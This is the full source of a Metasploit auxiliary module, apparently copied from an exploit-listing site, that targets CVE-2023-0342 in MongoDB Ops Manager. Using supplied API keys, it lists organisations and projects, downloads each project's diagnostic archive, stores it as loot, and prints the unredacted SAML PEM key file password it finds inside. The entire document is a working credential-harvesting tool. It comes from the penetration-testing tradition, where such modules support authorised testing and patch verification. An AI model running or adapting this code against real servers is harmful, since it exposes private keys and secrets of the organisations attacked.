Share
## https://sploitus.com/exploit?id=MSF:AUXILIARY-GATHER-MONGODB_OPS_MANAGER_DIAGNOSTIC_ARCHIVE_INFO-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'digest/md5'
require 'zlib'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'MongoDB Ops Manager Diagnostic Archive Sensitive Information Retriever',
'Description' => %q{
MongoDB Ops Manager Diagnostics Archive does not redact SAML SSL Pem Key File Password
field (mms.saml.ssl.PEMKeyFilePassword) within app settings. Archives do not include
the PEM files themselves. This module extracts that unredacted password and stores
the diagnostic archive for additional manual review.
This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and
MongoDB Ops Manager v6.0 prior to 6.0.12.
API credentials with the role of GLOBAL_MONITORING_ADMIN or GLOBAL_OWNER are required.
Successfully tested against MongoDB Ops Manager v6.0.11.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
],
'References' => [
[ 'URL', 'https://github.com/advisories/GHSA-xqvf-v5jg-pxc2'],
[ 'URL', 'https://www.mongodb.com/docs/ops-manager/current/reference/configuration/#mongodb-setting-mms.https.PEMKeyFilePassword'],
[ 'CVE', '2023-0342']
],
'Targets' => [
[ 'Automatic Target', {}]
],
'DisclosureDate' => '2023-06-09',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [],
'Reliability' => [],
'SideEffects' => []
}
)
)
register_options(
[
Opt::RPORT(8080),
OptString.new('API_PUBKEY', [ true, 'Public Key to login with for API requests', '']),
OptString.new('API_PRIVKEY', [ true, 'Password to login with for API requests', '']),
OptString.new('TARGETURI', [ true, 'The URI of MongoDB Ops Manager', '/'])
]
)
end
def check
url = normalize_uri(target_uri.path, 'api', 'public', 'v1.0')
auth_response = digest_auth(url)
# https://www.mongodb.com/docs/ops-manager/current/tutorial/update-om-with-latest-version-manifest-with-api/
res = send_request_cgi(
'uri' => url,
'headers' => {
'accept' => 'application/json',
'authorization' => auth_response
}
)
return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
roles = res.get_json_document.dig('apiKey', 'roles')
return Exploit::CheckCode::Unknown("#{peer} - Unable to retrieve roles") if roles.nil?
roles = roles.map { |hash| hash['roleName'] }
return Exploit::CheckCode::Safe("API key requires GLOBAL_MONITORING_ADMIN or GLOBAL_OWNER permissions. Current permissions: #{permission.join(', ')}") unless roles.include?('GLOBAL_MONITORING_ADMIN') || roles.include?('GLOBAL_OWNER')
Exploit::CheckCode::Detected('API key has correct roles but version detection not possible')
end
def username
datastore['API_PUBKEY']
end
def password
datastore['API_PRIVKEY']
end
def digest_auth(url)
# get a 401 so we get the WWW-Authenticate header
res = send_request_cgi(
'uri' => url,
'headers' => {
'accept' => 'application/json'
}
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Basic auth not enabled, but is expected") unless res.code == 401
# Define the regular expression pattern to capture key-value pairs
pattern = /(\w+)="(.*?)"/
parsed_hash = {}
res.headers['WWW-Authenticate'].scan(pattern) do |key, value|
parsed_hash[key] = value
end
parsed_hash['nc'] = '00000001'
parsed_hash['cnonce'] = '0a4f113b' # XXX randomize?
# Calculate the response
ha1 = Digest::MD5.hexdigest("#{username}:#{parsed_hash['realm']}:#{password}")
ha2 = Digest::MD5.hexdigest("GET:#{url}")
parsed_hash['response'] = Digest::MD5.hexdigest("#{ha1}:#{parsed_hash['nonce']}:#{parsed_hash['nc']}:#{parsed_hash['cnonce']}:#{parsed_hash['qop']}:#{ha2}")
%(Digest username="#{username}", realm="#{parsed_hash['realm']}", nonce="#{parsed_hash['nonce']}", uri="#{url}", cnonce="#{parsed_hash['cnonce']}", nc=#{parsed_hash['nc']}, qop=auth, response="#{parsed_hash['response']}", algorithm=MD5)
end
def get_orgs
url = normalize_uri(target_uri.path, 'api', 'public', 'v1.0', 'orgs')
auth_response = digest_auth(url)
# https://www.mongodb.com/docs/ops-manager/v6.0/reference/api/organizations/organization-get-all/
res = send_request_cgi(
'uri' => url,
'headers' => {
'accept' => 'application/json',
'authorization' => auth_response
}
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials or not enough permissions (response code: #{res.code})") if res.code == 401
res.get_json_document
end
def get_projects(org)
url = normalize_uri(target_uri.path, 'api', 'public', 'v1.0', 'orgs', org, 'groups')
auth_response = digest_auth(url)
# https://www.mongodb.com/docs/ops-manager/current/reference/api/organizations/organization-get-all-projects/
res = send_request_cgi(
'uri' => url,
'ctype' => 'application/json',
'headers' => {
'accept' => 'application/json',
'authorization' => auth_response
}
)
return [] if res.nil? || res.code == 401
res.get_json_document['results']
end
def get_diagnostic_archive(project)
url = normalize_uri(target_uri.path, 'api', 'public', 'v1.0', 'groups', project, 'diagnostics')
auth_response = digest_auth(url)
# https://www.mongodb.com/docs/ops-manager/current/reference/api/diagnostics/get-project-diagnostic-archive/
res = send_request_cgi(
'uri' => url,
'ctype' => 'application/json',
'headers' => {
'accept' => 'application/gzip',
'authorization' => auth_response
},
'vars_get' => { 'pretty' => 'true' }
)
return unless res&.code == 200
loot_location = store_loot('mongodb.ops_manager.project_diagnostics', 'application/gzip', rhost, res.body, "project_diagnostics.#{project}.tar.gz", "Project diagnostics for MongoDB Project #{project}")
print_good("Stored Project Diagnostics files to #{loot_location}")
vprint_status(' Opening project_diagnostics.tar.gz')
gz_reader = Zlib::GzipReader.new(StringIO.new(res.body))
tar_reader = Rex::Tar::Reader.new(gz_reader)
tar_reader.each do |entry|
next unless entry.full_name == 'global/appSettings.json'
json_data = JSON.parse(entry.read)
next unless json_data.key? 'instanceOverrides'
json_data['instanceOverrides'].each do |key, value|
next unless value.key? 'mms.saml.ssl.PEMKeyFilePassword'
if value['mms.saml.ssl.PEMKeyFilePassword'] == '<redacted>'
fail_with(Failure::NotVulnerable, 'Value is <redacted>, server is patched.')
else
print_good("Found #{key}'s unredacted mms.saml.ssl.PEMKeyFilePassword: #{value['mms.saml.ssl.PEMKeyFilePassword']}")
end
end
end
tar_reader.close
gz_reader.close
end
def run
vprint_status('Checking for orgs')
orgs = get_orgs
orgs['results'].each do |org|
org = org['id']
vprint_status("Looking for projects in org #{org}")
projects = get_projects(org)
projects.each do |project|
vprint_good(" Found project: #{project['name']} (#{project['id']})")
get_diagnostic_archive(project['id'])
end
end
end
end